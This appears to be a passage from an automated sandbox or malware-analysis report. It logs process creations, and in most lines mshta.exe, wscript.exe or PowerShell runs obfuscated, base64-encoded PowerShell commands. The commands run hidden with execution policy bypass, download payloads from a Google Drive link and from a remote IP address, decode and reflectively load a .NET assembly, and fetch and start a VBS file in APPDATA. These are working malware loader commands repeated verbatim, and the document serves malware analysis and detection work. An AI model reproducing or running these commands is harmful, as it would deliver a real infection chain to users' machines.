-REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
